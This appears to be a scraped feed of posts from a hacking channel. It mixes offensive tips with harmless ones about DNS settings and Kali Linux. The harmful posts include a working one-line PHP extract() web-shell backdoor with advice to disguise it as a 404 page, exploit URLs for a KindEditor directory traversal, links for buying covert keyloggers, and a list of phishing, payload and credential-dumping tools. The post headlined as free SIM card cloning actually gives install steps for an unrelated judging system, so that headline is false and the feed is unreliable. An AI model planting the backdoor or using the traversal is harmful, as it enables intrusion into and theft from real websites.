▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.

codecode show as below:

1) extract
(PHP 4, PHP 5)
extract — import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.


2) Specific application:

1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)

3) Server code:


<?@extract($_REQUEST);@die($err($info));?>

4) Finally, add various codes, tags and 404...you know (‵▽′)ψ


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Analysis of the evolution of the transparent tribe hacker organization
Let's see the truth #Cyberattack #Analyse

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST ANONYMOUS KEYLOGGERS(PAID/TRIALS/FREE)

https://mac.keylogger.org/

https://android.keylogger.org/

https://www.keyloggers.com/

https://netbull-keylogger.keyloggers.com/10/buy1click.html

http://staffcop-standard.keyloggers.com/review.html

http://spytector.keyloggers.com/review.html

https://all-in-one-keylogger.keyloggers.com/10/buy1click.html

https://refog-personal-monitor.keyloggers.com/11/buy1click.html

https://spyrix-personal-monitor-pro.keyloggers.com/12/buy1click.html

https://staffcop-standard.keyloggers.com/review.html

https://netbull-keylogger.keyloggers.com/review.html

https://refog-personal-monitor.keyloggers.com/review.html

https://total-logger.keyloggers.com/review.html

https://spytech-spyagent-standard-edition.keyloggers.com/review.html

@uNDERCODEtESTING
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A REAL FREE SIM CARD CLONING-OPEN SOURCE :)

R E Q U I R E M E N T S :

-gcc/g++ (with 32 bit support – for compiling submissions) with C++17 support (Debian package: g++-multilib)

-MariaDB (Debian package: mariadb-server)

-MariaDB client library (Debian packages: libmariadbclient-dev)

-libseccomp (Debian package: libseccomp-dev)

-GNU/Make (Debian package: make version >= 4.2.1)

-libzip (Debian package: libzip-dev)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev

2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.

3) Arch Linux

> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \

> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \

> sudo systemctl enable mariadb && sudo systemctl start mariadb

🦑Instructions
In case you installed MariaDB server for the first time, you should run:

1️⃣sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules

2️⃣git clone --recursive https://github.com/varqox/sim &&

3️⃣cd sim

4️⃣Build

5️⃣make -j $(nproc)

6️⃣Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty – if that does not work try running the below command with sudo):

> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p

7️⃣Install

8️⃣make install

9️⃣It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.

🔟If you want to install Sim in other location that build/ type

make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run

1️⃣1️⃣If you have not installed Sim in the default location use command:

make run DESTDIR=where-you-installed-Sim

1️⃣2️⃣You can combine building, installation and running commands into:

make all install run

1️⃣3️⃣Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim

1️⃣4️⃣Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!

Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.

1️⃣5️⃣If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):

@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build

ANY DOUBT ASK @Undercode_Testing
ENJOY ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The Open Graph protocol When you add a URL in a Facebook post, Facebook will use the Open Graph protocol (FB doc) to display rich content. Here is a summary about how Facebook uses OG to embed external content in a FB post:

1. The aacker posts a URL on a FB post

2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video file URL)

3. The vicm views the FB post with the cover image and a play buon

4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Disadvantages of Kali Linux

As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are —

- It makes the system slower.

- The system can get easily corrupted.

-Some softwares may not be functioned well .

-KALI is not as easy to use because it’s penetration oriented.

-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources

-forget about universities all anonymous hackers don.t use kali

-In the process of using KALI for NORMAL, you may Trash some of KALI’s specialized settings for it’s own security.

wiki resoucesxd
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Now it could be that your CCTV, IP camera is simply exposed on the Internet and the attacker has found it on sites such as Shodan. You haven’t changed the default password and bam, they are in. Watching your every move.

detailed proxies list

https://pastebin.com/LNiPv5hC

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Kindeditor traverse directory 0DAY problem

KindEditor is a set of open source HTML visual editor, mainly used to allow users to get WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs.

> KindEditor is very suitable for use in CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in , KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.

🦑Use method:

1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php


2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Speedup internet via DNS :


A) ROUTER

If you're using a router for your office network DNS settings—and you probably are—log into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:

-For IPv4: 1.1.1.1 and 1.0.0.1
-For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.

B) WINDOWS
With Windows 10:

1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5)Double-click on the active network adapter.
6)Write down any existing DNS server entries for future reference.
7)Click Use The Following DNS Server Addresses.
8)Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
9) With Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:

10) Click on Network and Internet.

11) Click on Change Adapter Settings.
12) Right click on the Wi-Fi network you are connected to, then click Properties.

13) Select Internet Protocol Version 4 (or Version 6 if desired).
14) Click Properties.

15) Write down any existing DNS server entries for future reference.

16) Click Use The Following DNS Server Addresses.

17) Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A GOOD 2020 of LIST TERMUX-LINUX TOOLS :

- Threadtear - Multifunctional Java Deobfuscation Tool Suite

- Wifipumpkin3 - Powerful Framework For Rogue Access Point Attack

- Catchyou - FUD Win32 Msfvenom Payload Generator

- PayloadsAllTheThings - A List Of Useful Payloads And Bypass For Web Application Security And Pentest/CTF

- Exegol - Exegol Is A Kali Light Base With A Few Useful Additional Tools And Some Basic Configuration

- GDBFrontend - An Easy, Flexible And Extensionable GUI Debugger

- Shellerator - Simple CLI Tool For The Generation Of Bind And Reverse Shells In Multiple Languages

- Powerob - An On-The-Fly Powershell Script Obfuscator Meant For Red Team Engagements

- How to Set Up a VPN on Kodi in 2 Minutes or Less

- PowerSploit - A PowerShell Post-Exploitation Framework

- HiveJack - This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host

- Nexphisher - Advanced Phishing Tool For Linux & Termux

- TorghostNG - Make All Your Internet Traffic Anonymized Through Tor Network

- Sshprank - A Fast SSH Mass-Scanner, Login Cracker And Banner Grabber Tool Using The Python-Masscan Module

- Generator-Burp-Extension - Everything You Need About Burp Extension Generation

- Parsec - Secure Cloud Framework

- Invoker - Penetration Testing Utility

- Authelia - The Single Sign-On Multi-Factor Portal For Web Apps

- OSSEM - A Tool To Assess Data Quality

- Klar - Integration Of Clair And Docker Registry

- Powershell-Reverse-Tcp - PowerShell Script For Connecting To A Remote Host.
from git 2020✅
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#full with pictures